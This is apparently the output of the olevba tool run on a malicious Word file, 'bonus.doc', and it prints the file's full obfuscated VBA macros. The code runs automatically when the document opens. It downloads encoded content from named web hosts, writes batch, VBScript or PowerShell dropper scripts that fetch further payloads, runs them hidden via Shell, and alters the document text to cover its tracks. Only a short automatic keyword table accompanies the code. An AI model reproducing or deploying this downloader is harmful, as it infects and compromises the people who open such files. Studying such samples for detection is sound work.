Malicious Word macro

1. olevba 0.26 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MAS-HB- bonus.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: bonus.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: bonus.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15. Sub Dqwkdojqwiodqw_Open()
16.      
17. End Sub
18. Sub Ejoqiwjdioqwjdqo_Open()
19.      
20. End Sub
21. Sub Auto_Open()
22.     Djiqowjdwoiqjdqwo
23. End Sub
24. Sub Djiqowjdwoiqjdqwo()
25.     UQHDIQWHD = "1j2h eiuh1k2jeh21kjeh jk12g ehj12g"
26.     Xjqwidjowqjdq
27. End Sub
28. Sub Giqjwdhqwkjq()
29.     DQUHWDIWQ = "eji21h ui21he21"
30. End Sub
31.  
32. Sub AutoOpen()
33.     Auto_Open
34. End Sub
35. Sub Workbook_Open()
36.     NJQWBDJQKW = "j2hge h1hj1g2 hj21gje "
37.     Auto_Open
38. End Sub
39.  
40. Sub Xjqwidjowqjdq()
41.  
42.    
43.     Dim fallout As Integer, silkroad As Integer, inclife As Integer, inredible As Integer
44.     Dim retVal As Variant, gana As Integer, turkey As Integer, malay As Integer, SPAIN As String, BOLIVIA As String
45.     BOLIVIA = Chr(90 + 2)
46.    
47.    
48.     ANGOLA = Ubqhwdhwqbd(15425) + ""
49.     SPAIN = Chr(84) & "em" + "p"
50.     QHDQUWH = ANGOLA
51.     FL2 = QHDQUWH
52.     PH2 = Module2.Goabc(SPAIN) + BOLIVIA
53.    
54.     silkroad = 9
55.     jwnqdw = -1
56.    
57.     BOSNIA = 12312312
58.     BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
59.     BALAGAN = BOSNIA
60.    
61.  
62.     TROYA = "banbv2dbgh21f gd2h1f21ghfd gh12fgh1t"
63.     JWIDJIAAA = ""
64.     HUYFEA = "gdhjqwg hqjwgdhjqwg hjqwgdhjqwg"
65.     QIWJDABB = "b"
66.     HUYFEA = QIWJDABB + "a" + "t"
67.     IUQJWD = "bjgqhdhjg21jhgdhj1g jh1eg hj21ge j2h"
68.     PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
69.    
70.     gana = NUqwdqwbdsad(1 - 300 * Sin(20))
71.     SSS = Chr(BALAGAN + 2 + gana)
72.     VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
73.     BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
74.    
75.     INTG = "" & "o" & "bject"
76.     KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "dule"
77.     AFTG = Chr(109) & KIWD
78.    
79.     SXEE = Chr(46)
80.     SXAA = Chr(101)
81.     SXE = SXEE & SXAA & "" & "xe"
82.     GNG = Chr(2 ^ 2 + 42) + "jpg"
83.    
84.    
85.    
86.     HUQD = Chr(30 + 16 + 1)
87.     ATTH = "ht" & "t" & "" & "p" & ":" & "/" & Chr(47)
88.     BQHJDQ = "sav" + "epic" & Chr(46) & "su" + HUQD
89.      
90.     PSPTH = PH2 + PSFL
91.     VBPTH = PH2 + VBFL
92.     BAPTH = "1hj2gehj12g1h f2gh112 feg1h2f e"
93.     ABPTH = PH2 + BAFL
94.     BAPTH = ABPTH
95.     JHQKWDQAASS = BQHJDQ
96.    
97.     Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
98.    
99.     DRT = 315
100.     BFT = 316
101.     CFT = 317
102.     DFT = 318
103.     EFT = 319
104.     Dim NUWDHUQHUQWDH As String
105.     NUWDHUQHUQWDH = "USE" & "RPROFILE"
106.     Dim PBIn As String, asdwq As String, MIWDWQ As String
107.    
108.    
109.    
110.     TSTS = "." + "t" + "xt"
111.     CDDD = "78672738612836" + TSTS
112.     LNSS = "p" & "a" & "p" & "a" & "" + TSTS
113.     STT1 = "www.buck.tv/cms/w" & "p-co" & "ntent/up" & "loads/"
114.     STT2 = "www.bereciartua.com/w" & "p-cont" & "ent/th" & "emes/bere" & "ciartua/"
115.  
116.  
117.     PBIn = ATTH + STT1 + CDDD
118.     CONT = Module2.Linolium(PBIn)
119.      
120.     asdwq = Rasdas(CONT)
121.    
122.     HQUWDAAA = "0"
123.     If (asdwq <> "=") Then
124.         PBIn = ATTH + STT2 + CDDD
125.         CONT = Module2.Linolium(PBIn)
126.         asdwq = CONT
127.         HQUWDAAA = "1"
128.     End If
129.    
130.     CONT = Quqhwdbyas(asdwq)
131.      
132.     Dim ahuywdgqy As String
133.      
134.     TVT10 = Port(CONT, "t" & "ext10")
135.     TVT20 = Port(CONT, "t" & "ext20")
136.     TVT21 = Port(CONT, "t" & "ext21")
137.     TVT30 = Port(CONT, "t" & "ext30")
138.     TVT31 = Port(CONT, "t" & "ext31")
139.     XPT1 = Port(CONT, "stext1")
140.     XPT2 = Port(CONT, "stext2")
141.     XPT3 = Port(CONT, "stext3")
142.    
143.    
144.     WVR = Module2.Goabc(NUWDHUQHUQWDH)
145.     hufehu1 = InStr(WVR, "sers\")
146.    
147.     Dim hudhw As Integer
148.     Dim ghdAdd(1 To 3)
149.     ghdAdd(1) = "1"
150.     ghdAdd(2) = "0"
151.     ghdAdd(3) = "0"
152.    
153.     If (hufehu1 <> 0) Then
154.         ghdAdd(1) = "2"
155.     Else
156.         ghdAdd(2) = "3"
157.     End If
158.  
159.  
160.     JHWQUD = Join(ghdAdd)
161.     hudhw = Val(JHWQUD)
162.    
163.     Module2.WaitFor (1)
164.    
165.     MIWDWQ = ATTH + STT1 + LNSS
166.     If (HQUWDAAA = "1") Then
167.         MIWDWQ = ATTH + STT2 + LNSS
168.     End If
169.    
170.     SEXX = Module2.Linolium(MIWDWQ)
171.    
172.     PSTB = PBIn + "123123123"
173.     MSTAR1 = JHQKWDQAASS + "5751812" + GNG
174.     MSTAR2 = JHQKWDQAASS + "5757956" + GNG
175.     STAR1 = ATTH + MSTAR1
176.     STAR2 = ATTH + MSTAR2
177.     FFQ = "8"
178.     FF = FFQ + SXE
179.    
180.      If (hudhw = 130) Then
181.      Open BAPTH For Output As #DRT
182.      Print #DRT, XPT1
183.      Print #DRT, ":jadkjasghdjasg" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
184.      Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
185.      Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
186.      Print #DRT, XPT2
187.      Close #DRT
188.      
189.      Module2.WaitFor (1)
190.      
191.      Open VBPTH For Output As #BFT
192.      Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
193.      Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
194.      Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
195.      Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
196.      Print #BFT, XPT3
197.      Close #BFT
198.      
199.      BDDT.WaitFor (1)
200.      NTH1 = Module3.HowEver(retVal, BAPTH)
201.      
202.      End If
203.      
204.      
205.      HUDQG = "';"
206.      
207.      
208.      
209.       If (hudhw = 200) Then
210.        
211.      ZPQSKD = FL2
212.      Open PSPTH For Output As #CFT
213.      Print #CFT, "$nqjkwdnq = 'qiwdqwhd';"
214.      Print #CFT, "$ndqbwdwqs = 'jqwdnjkqwhd';"
215.      Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
216.      Print #CFT, "$ggtt = '" + SEXX + "';"
217.      Print #CFT, "$pths = '" + PH2 + HUDQG
218.      
219.      Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
220.      Print #CFT, "$nnm = '" + FFQ + "';"
221.      Print #CFT, TVT10
222.      Close #CFT
223.      
224.      Open VBPTH For Output As #DFT
225.      Print #DFT, TVT30
226.      Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
227.      Print #DFT, TVT31
228.      Close #DFT
229.    
230.      Open BAPTH For Output As #EFT
231.      Print #EFT, Chr(30 + 30 + 4) + "echo off" & vbCrLf & ":jqduqihdjsakd"
232.      Print #EFT, TVT20
233.      Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
234.      Print #EFT, ":nqudiiqhdjkashd"
235.      Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
236.      Print #EFT, ":nqjdkbjkbdhjqwb"
237.      Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
238.      Print #EFT, TVT21
239.      Close #EFT
240.      Module2.WaitFor (1)
241.      
242.      NTH2 = Module3.HowEver(retVal, BAPTH)
243.      
244.      End If
245.      
246.     JUW = Chr(47)
247.     AKK = Chr(60)
248.     ZKK = ">"
249.     NTH3 = Module3.India(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
250.     NTH4 = Module3.India(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
251.     NTH5 = Module3.India(AKK + INTG + ZKK, "", 3)
252.     NTH6 = Module3.India(AKK + JUW + INTG + ZKK, "", 3)
253.     NTH7 = Module3.India(AKK + AFTG + ZKK, "", 3)
254.     NTH8 = Module3.India(AKK + JUW + AFTG + ZKK, "", 3)
255.    
256. End Sub
257.  
258.  
259. Public Function NUqwdqwbdsad(a As Integer)
260. NUqwdqwbdsad = Sgn(a)
261. End Function
262.  
263. Public Function Hhqudhqwgyuqwaaa(a As Integer)
264. Hhqudhqwgyuqwaaa = Sgn(a)
265. End Function
266.  
267. Public Function Ubqhwdhwqbd(a As Integer)
268. Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
269. End Function
270.  
271.  
272. Public Function Quqhwdbyas(ByVal strData As String) As String
273.     Dim objXML As Object
274.     Dim objNode As Object
275.     Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
276.     nudqwd = Log10(100)
277.     asduiwhqdqiw = Hhqudhqwgyuqwaaa(1 - nudqwd)
278.     QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
279.     Set objXML = CreateObject(QHDHUQW)
280.     Set objNode = objXML.createElement("b6" + "4")
281.     objNodeS = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
282.     objNodeE = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
283.     objNodeQ = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
284.     objNodeZ = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
285.     objNode.DataType = "bin.b" + Chr(97) + "se" + "6" & "4"
286.     objNode.Text = strData
287.     WUDHA = objNode.nodeTypedValue
288.     Quqhwdbyas = WUDHA
289.     Set objNode = Nothing
290.     Set objXML = Nothing
291. End Function
292.  
293. Public Function Port(a, b As String)
294. Dim krd, tent As Integer
295. UQWD = "" & Chr(58 + 2)
296. NDUW = "" & Chr(70 - 8)
297. krd = InStr(1, a, UQWD + b + NDUW) + 8
298. tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
299. KLMN = Mid$(a, krd, tent)
300. HUQHWDA = KLMN
301. Port = HUQHWDA
302. End Function
303.  
304. Private Static Function Rasdas(a As String)
305. Rasdas = Right(a, 1)
306. End Function
307.  
308.  
309. Private Static Function Log10(x)
310. SWOPJDQIOW = "jqhw gdhjg12hjgd21g21d"
311. Log10 = Log(x) / Log(10#)
312. End Function
313.  
314.  
315.  
316.  
317.  
318.  
319.  
320.  
321.  
322.  
323.  
324.  
325.  
326.  
327. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
328. ANALYSIS:
329. +------------+----------------+-----------------------------------------+
330. | Type       | Keyword        | Description                             |
331. +------------+----------------+-----------------------------------------+
332. | AutoExec   | AutoOpen       | Runs when the Word document is opened   |
333. | AutoExec   | Auto_Open      | Runs when the Excel Workbook is opened  |
334. | AutoExec   | Workbook_Open  | Runs when the Excel Workbook is opened  |
335. | Suspicious | Open           | May open a file                         |
336. | Suspicious | Chr            | May attempt to obfuscate specific       |
337. |            |                | strings                                 |
338. | Suspicious | CreateObject   | May create an OLE object                |
339. | Suspicious | Output         | May write to a file (if combined with   |
340. |            |                | Open)                                   |
341. | Suspicious | Print #        | May write to a file (if combined with   |
342. |            |                | Open)                                   |
343. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
344. |            |                | be used to obfuscate strings (option    |
345. |            |                | --decode to see all)                    |
346. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
347. |            |                | may be used to obfuscate strings        |
348. |            |                | (option --decode to see all)            |
349. +------------+----------------+-----------------------------------------+
350. -------------------------------------------------------------------------------
351. VBA MACRO Module1.bas
352. in file: bonus.doc - OLE stream: u'Macros/VBA/Module1'
353. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
354. Public Function Xjdkhjfwefw(a As Object)
355. Xjdkhjfwefw = (a.responseText)
356. End Function
357.  
358.  
359. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
360. ANALYSIS:
361. No suspicious keyword or IOC found.
362. -------------------------------------------------------------------------------
363. VBA MACRO Module2.bas
364. in file: bonus.doc - OLE stream: u'Macros/VBA/Module2'
365. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
366.  
367. Public Function Goabc(sps As String)
368. QBYDGQWDWQ = "1hj2ehjg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
369. QBYADGQWDWQ = "1sdhj2ehjg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
370. QBYXDGQWDWQ = "1hj2ehjdsg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
371. Goabc = Environ(sps)
372. End Function
373. Public Function Linolium(nbqjbdjqw As String)
374. Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Kjqiwdhqwuhdjqkwhdjkqwbd As Object, AHUDWQI As String
375. Dim ashdUHhda As String, hausd As Integer
376. ashdUHhda = nbqjbdjqw
377. hausd = Sgn(0 - Abs(Cos(140)))
378. BQDHJQWDGWQJGS = "MSXML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
379. 'MsgBox (BQDHJQWDGWQJGS)
380. Set Kjqiwdhqwuhdjqkwhdjkqwbd = CreateObject(BQDHJQWDGWQJGS)
381. Kjqiwdhqwuhdjqkwhdjkqwbd.Open "GE" & "" & "T", ashdUHhda
382. Kjqiwdhqwuhdjqkwhdjkqwbd.Send (AHUDWQI)
383. Linolium = Module1.Xjdkhjfwefw(Kjqiwdhqwuhdjqkwhdjkqwbd)
384. End Function
385. Sub WaitFor(NumOfSeconds As Long)
386. Dim SngSec As Long
387. SngSec = Timer + NumOfSeconds
388. Do While Timer < SngSec
389. DoEvents
390. Loop
391. End Sub
392.  
393.  
394. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
395. ANALYSIS:
396. +------------+--------------+-----------------------------------------+
397. | Type       | Keyword      | Description                             |
398. +------------+--------------+-----------------------------------------+
399. | Suspicious | Open         | May open a file                         |
400. | Suspicious | Chr          | May attempt to obfuscate specific       |
401. |            |              | strings                                 |
402. | Suspicious | CreateObject | May create an OLE object                |
403. | Suspicious | Environ      | May read system environment variables   |
404. +------------+--------------+-----------------------------------------+
405. -------------------------------------------------------------------------------
406. VBA MACRO Module3.bas
407. in file: bonus.doc - OLE stream: u'Macros/VBA/Module3'
408. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
409.  
410.  
411. Public Function India(dnuwhd As String, b As String, c As Integer)
412. Dim selectedText As String
413. Dim ssjidoqwhduqhwidqwudihq As Range, lesleslesqjhdjqkwhdwq As Range
414. Set ssjidoqwhduqhwidqwudihq = ActiveDocument.Range
415. HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
416. HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
417. With ssjidoqwhduqhwidqwudihq.Find
418. 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
419. 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
420. .Text = dnuwhd
421. .MatchWholeWord = True
422. ssjidoqwhduqhwidqwudihq.Find.Execute
423. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseEnd
424. Dim wdwq As String
425. Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
426. Dim wdsadwq As String
427. lesleslesqjhdjqkwhdwq.Start = ssjidoqwhduqhwidqwudihq.End
428. .Text = b
429. .MatchWholeWord = True
430. .Execute
431. RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
432. RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
433. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseStart
434. lesleslesqjhdjqkwhdwq.End = ssjidoqwhduqhwidqwudihq.Start
435.  
436. If (c = 1) Then
437.     selectedText = lesleslesqjhdjqkwhdwq.Delete
438. End If
439. If (c = 2) Then
440.     lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
441. End If
442.  
443. Dim hduwaa As Integer
444. hduwaa = 1 - 2 ^ 4
445.  
446. QHUDW = Chr(33 + Sgn(hduwaa))
447.  
448. If (c = 3) Then
449.     With ssjidoqwhduqhwidqwudihq.Find
450.     .Text = a
451.     .Replacement.Text = QHUDW
452.     'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
453.    'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
454.    'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
455.    'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
456.    .Wrap = wdFindContinue
457.     .Execute Replace:=wdReplaceAll
458.     End With
459. End If
460.  
461. End With
462. End Function
463.  
464. Public Function HowEver(a As Variant, b)
465. VGQDVHQWD = "h2eh1 fg12e"
466. a = Shell(b, 0)
467. HowEver = a
468. End Function
469.  
470.  
471.  
472.  
473.  
474.  
475.  
476.  
477.  
478.  
479.  
480.  
481.  
482.  
483.  
484. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
485. ANALYSIS:
486. +------------+---------+-----------------------------------------+
487. | Type       | Keyword | Description                             |
488. +------------+---------+-----------------------------------------+
489. | Suspicious | Chr     | May attempt to obfuscate specific       |
490. |            |         | strings                                 |
491. | Suspicious | Shell   | May run an executable file or a system  |
492. |            |         | command                                 |
493. +------------+---------+-----------------------------------------+